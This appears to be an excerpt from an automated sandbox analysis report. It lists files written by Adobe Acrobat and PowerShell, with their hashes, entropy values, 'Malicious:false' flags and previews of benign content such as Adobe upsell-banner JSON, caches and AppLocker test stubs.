                                                                                            Size (bytes):1164
                                                                                            Entropy (8bit):5.703394358334504
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:Yv6X97mBKLgEfIcZVSkpsn264rS514ZjBrwloJTmcVIsrSK5P:YvQ6EgqprtrS5OZjSlwTmAfSKR
                                                                                            MD5:E13196369C8569840D5236A926AA9AEF
                                                                                            SHA1:870AC91F842B360899DEC1A2494A40E1FB819FE9
                                                                                            SHA-256:DDDBD127A6B895D2F38770CC19BEDE5DC3A4644EC0AB434591F05FECA566CE40
                                                                                            SHA-512:F0DBCDD91A885046039C59B51E0096CABD2C3F64A7F443B42AE6FE5618170851E2E5D74165D19ABD2E0562E96E5C55CF20BE4D60F7291364CDBB21DE1EB1955C
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"b6787ff6-cf18-49f0-919a-4cf82a2b795d","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1731619470002,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85531_264848ActionBlock_0","campaignId":85531,"containerId":"1","controlGroupId":"","treatmentId":"ee1a7497-76e7-43c2-bb63-9a0551e11d73","variationId":"264848"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IlRyeSBBY3JvYmF0IFBybyJ9LCJ1aSI6eyJ0aXRsZV9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE1cHgiLCJmb250X3N0eWxlIjoiMCJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEzcHgiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0b1xucHJlbWl1bSBQREYgYW5kIGUtc2lnbmluZ1xudG9vbHMuIn0sImJhbm5lcl9zdHlsaW5nIjo
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):289
                                                                                            Entropy (8bit):5.311698824268111
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXcgBPV0nZiQ0YWieoAvJfYdPeUkwRe9:YvXKXj5V0cziVGg8Ukee9
                                                                                            MD5:A62270F8CA40661D8C3298E76F53585C
                                                                                            SHA1:5953D840AA808BD84E28C80AB4CC0A657039118D
                                                                                            SHA-256:DC559531FDC7D1EB7E48247392A53CA97E40D0AA07B64E58A8EBA2197FFAE698
                                                                                            SHA-512:83492C1683DBCA1E828C5EC7C46F4AC3CB40CB582B86766ACB2A3EA121A1B08F145C0138B769020608F8EA2B6262A7E56845BB5B9725D4A34A0483841F6FE6C0
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"b6787ff6-cf18-49f0-919a-4cf82a2b795d","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1731619470002,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):284
                                                                                            Entropy (8bit):5.297637460773932
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXcgBPV0nZiQ0YWieoAvJf+dPeUkwRe9:YvXKXj5V0cziVG28Ukee9
                                                                                            MD5:C0C9C2418B6A2D82199336B9E302CF42
                                                                                            SHA1:49A79E3D1D7D2E5F9C59927136073A5DED22D023
                                                                                            SHA-256:813D417CE028335E718FB7B4EA7DA928E4FB393D20130A048B0B5FFD927DCBA9
                                                                                            SHA-512:F8EB695B33A12A2EF126F0ABD7D2DA24F5FD0DA78CE618A04628A70368F23CBAA7A199D6FCEF72BFD46109D4914B4B27FC5D7EC712E19C0EC11BE7E074631B7B
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"b6787ff6-cf18-49f0-919a-4cf82a2b795d","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1731619470002,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):291
                                                                                            Entropy (8bit):5.295165517651473
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXcgBPV0nZiQ0YWieoAvJfbPtdPeUkwRe9:YvXKXj5V0cziVGDV8Ukee9
                                                                                            MD5:24A898FF6B94467112AD88F05231ECB2
                                                                                            SHA1:77E889E2DCB63A384672C378177C8CE503FE9405
                                                                                            SHA-256:8F32B49A9BA66B384116A46459DF843CBFEF31B3F24984719F1EAE2A1EF65C1A
                                                                                            SHA-512:F2D0963D5A1F61787110051A8FF459414F85A7C43F90C149D453E63477DB9423DBF550A829D1D4EAF91BC4A08C43E07AF9362FF58E86E49248E7E88DA754F5D6
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"b6787ff6-cf18-49f0-919a-4cf82a2b795d","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1731619470002,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):287
                                                                                            Entropy (8bit):5.298708767163343
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXcgBPV0nZiQ0YWieoAvJf21rPeUkwRe9:YvXKXj5V0cziVG+16Ukee9
                                                                                            MD5:E5F76834682791962E4C2B41A10ED854
                                                                                            SHA1:23CCFA9231775838AD8E3DDBC8D3C79F5BC5C82C
                                                                                            SHA-256:5CFB93729F56F4A55F360E6A569036B391B37461540AC8477B8A0ED342E3755F
                                                                                            SHA-512:92D320C47F55B990F15A32774DC33658942D706DEBF58B44114426F8C4CF341653094095E74CB92979E2918A723CB142F8ECF80E0C7E50582012052E8BB052B8
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"b6787ff6-cf18-49f0-919a-4cf82a2b795d","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1731619470002,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):1090
                                                                                            Entropy (8bit):5.669467760820594
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:Yv6X97mmamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSm:YvQ7BgkDMUJUAh8cvMm
                                                                                            MD5:B5326FFF31C07C3F84E09E84B0553C12
                                                                                            SHA1:884FC62EABC02D76984EDF382088C7B6E3B68D03
                                                                                            SHA-256:418EA17350BC95D51340F7B7F4C5556BC88AEAB3972F24B95FAE05F8AC0F890D
                                                                                            SHA-512:CE2E6AD09EEFBF0991B94D2FC7298DC42B84CE168D6394CB52F875C7AEA65255F1D5742B58AF322573BEB2392C1A89CA0E2DD0681DE634AEE978A4B958E0BFFE
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"b6787ff6-cf18-49f0-919a-4cf82a2b795d","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1731619470002,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):286
                                                                                            Entropy (8bit):5.276064769053216
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:YEQXJ2HXcgBPV0nZiQ0YWieoAvJfshHHrPeUkwRe9:YvXKXj5V0cziVGUUUkee9
                                                                                            MD5:332FD956D87473F3DD271E7B8642BFF0
                                                                                            SHA1:97C87723073AD1EFCE99992361B3B55E3E0D8F72
                                                                                            SHA-256:03E14AA1BE99FE8EF4026B1DC33A970179F3DB29078CFB62DC039BE0FED91DC2
                                                                                            SHA-512:5619EFB0F93470A80F57D28B4B9AD6A259C4D32E0D1ED1FDFFCA10109E3EEC39D83AB39EE81A84389B9CC08A296B6199F233350B3239FF011BC7F63CFD04366C
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"b6787ff6-cf18-49f0-919a-4cf82a2b795d","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1731619470002,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):782
                                                                                            Entropy (8bit):5.3649256126268465
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:YvXKXj5V0cziVGTq16Ukee1+3CEJ1KXd15kcyKMQo7P70c0WM6ZB/uhWjn:Yv6X97mx168CgEXX5kcIfANhm
                                                                                            MD5:1CEE2D1713C273B63B43F5F39642A489
                                                                                            SHA1:99011199E5C2C1273128CAE9A264CE71ED446D30
                                                                                            SHA-256:FAE459053B8B4E900AD1875C2522D8C09B5B127D18A66AFF48C0EBC332461F7C
                                                                                            SHA-512:E8DE2839E9AD4C446556E400A0D0E8BA8D99645F3C74F9141D30637F8BA6E6F8B5E348AFC77079B6B7C6498166B08FB83AAE85B9EB37E8AD427C8BE3AD686662
                                                                                            Malicious:false
                                                                                            Preview:{"analyticsData":{"responseGUID":"b6787ff6-cf18-49f0-919a-4cf82a2b795d","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1731619470002,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1731445935040}}}}
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):4
                                                                                            Entropy (8bit):0.8112781244591328
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:e:e
                                                                                            MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                            SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                            SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                            SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                            Malicious:false
                                                                                            Preview:....
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):2817
                                                                                            Entropy (8bit):5.149477624500062
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:YQwBajHayvPgwvWxSvMCtcEq4sHByajPPj0SySm2K2LSc0CGMVuZ5dx9630uyOG:Ym1T8UMQcEq4sHjPbYvW0jMSB9V
                                                                                            MD5:9550E158DF314032BF529B38C9103EEA
                                                                                            SHA1:066F6114FDE2BA1290EE74E761FEEC20B8350C6B
                                                                                            SHA-256:4C2788D402B419820478009548F897E327048B349E6AC66D487A8E28267E3AC2
                                                                                            SHA-512:4C627EA9377C07453E5062543D44445D3EA3CC9A3742D7EBAB7B3DA7A786A2A68DE84652C867B57C0DE782B8DBD9C6CB0EF81D16DF9AED8B9C4997DE68582914
                                                                                            Malicious:false
                                                                                            Preview:{"all":[{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"5b2a8974ce58431ed9245aa583e0553c","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1164,"ts":1731445934000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"5210c9b8f93bc5567f9c2c05646f9634","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1731445934000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"bbd3ef398a189c1d758e6a4568641e53","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1731445934000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"85a5942b778882a48b1f989eabbafcee","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1102,"ts":1731445934000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"e6927b229ced9bc540b9d8414691c96a","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1122,"ts":1731445934000},{"id":"Edit_InApp_Aug2020","info":{"dg":"228daf9db533066844fc2f1755a249c1","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":17
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 24, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 24
                                                                                            Category:dropped
                                                                                            Size (bytes):12288
                                                                                            Entropy (8bit):1.1457828438127566
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:TLhx/XYKQvGJF7ursO9LRZXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUud+:TFl2GL7msO9PXc+XcGNFlRYIX2v3kd9h
                                                                                            MD5:E1D1E668F29CB490B0DE0009BD8D46F3
                                                                                            SHA1:2C5559BF4D38E4DF886CD1EEA1A3850C288B2C1B
                                                                                            SHA-256:425FA89F7596444A40B8FD8A85BF4D5209D88F6D45B96BDA090CCB40472406F4
                                                                                            SHA-512:FCBD3298870D33587223E2545BFC14842C22888F86FBF3F4DDD99F4138132D37D8F860F72C13AF3BB116A9194CE505A0E6EE68A2BC9ED4788305A4C4D6CBDA6D
                                                                                            Malicious:false
                                                                                            Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:SQLite Rollback Journal
                                                                                            Category:dropped
                                                                                            Size (bytes):8720
                                                                                            Entropy (8bit):1.549156188336115
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:7+tA9LUXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHRuLuxJqLxx/XY5:7MA94Xc+XcGNFlRYIX2vMqVl2GL7msI
                                                                                            MD5:BBE24621F30C9A3290005F344E217456
                                                                                            SHA1:F00D7B08C2BA741F6964245AD1DAFD9AA0CA99D4
                                                                                            SHA-256:E39AD6D89B12723FB787EDFD4C846AA1F7FAEB81ED7A47BD60B9B0FA47698417
                                                                                            SHA-512:E252F274457BFB7697C0CCB388E1D0B53C6B9573D9337AA5AD2C1C6F08D9555A3B7DF31653F1946EF0891FFE50CAA79FE75FDABA3A4F5BDDFB887E829AEC88DA
                                                                                            Malicious:false
                                                                                            Preview:.... .c......E7...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................b..b.b.b.b.b.b.b.b.b.b.b.b.b..................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):66726
                                                                                            Entropy (8bit):5.392739213842091
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:RNOpblrU6TBH44ADKZEgIDyHXzxkaJuPfOsAdDY/TydLYyu:6a6TZ44ADEYyHjxk5PG6TgK
                                                                                            MD5:9B99946DCF1CEC21C9C493C7EB41B30D
                                                                                            SHA1:BD93B52AF19AE6755871010013F83F83FBD1CDDE
                                                                                            SHA-256:89B518FA51BDA53A56D977D53EF97BA6E426BE51E619842FD1EE9A0E974BB292
                                                                                            SHA-512:CF2D14E12C2669385F6244FDA40828CD3047F9CBF46F08E3B6D19F664707A07F7CBC62619B81F20C3AFAF204783B01F87E0F44CFA7C412020B6BB1ABC148CFE5
                                                                                            Malicious:false
                                                                                            Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):9434
                                                                                            Entropy (8bit):4.928515784730612
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                                            MD5:D3594118838EF8580975DDA877E44DEB
                                                                                            SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                                            SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                                            SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                                            Malicious:false
                                                                                            Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):64
                                                                                            Entropy (8bit):0.34726597513537405
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Nlll:Nll
                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                            Malicious:false
                                                                                            Preview:@...e...........................................................
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):246
                                                                                            Entropy (8bit):3.4709625315637744
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8qKPlvrNdlXH:Qw946cPbiOxDlbYnuRKtKPhNdlXH
                                                                                            MD5:33F105BD999BDD42092825E603C3F998
                                                                                            SHA1:960BC437E2FED88DBD2E3F6FEE0A970BB7AC686D
                                                                                            SHA-256:62FCAACBA50911C84CD7731DAF75F97F698931A299378858C69413DD484968AE
                                                                                            SHA-512:358715414DC1BF74B7DBF4B0672B22FB5AB3A9EE28895535FEBD34D1A8DADED3DDCC39BB3030EE8A08E641A9028E3535F44EDE85BBD7C28AC8FAA1AD6F283E8E
                                                                                            Malicious:false
                                                                                            Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.2./.1.1./.2.0.2.4. . .1.6.:.1.2.:.1.2. .=.=.=.....
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
                                                                                            Category:dropped
                                                                                            Size (bytes):144514
                                                                                            Entropy (8bit):7.992637131260696
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
                                                                                            MD5:BA1716D4FB435DA6C47CE77E3667E6A8
                                                                                            SHA1:AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
                                                                                            SHA-256:AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
                                                                                            SHA-512:65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
                                                                                            Malicious:false
                                                                                            Preview:PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..|....,.A.....Z..a<.C._..../G|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:ASCII text, with very long lines (393)
                                                                                            Category:dropped
                                                                                            Size (bytes):16525
                                                                                            Entropy (8bit):5.338264912747007
                                                                                            Encrypted:false
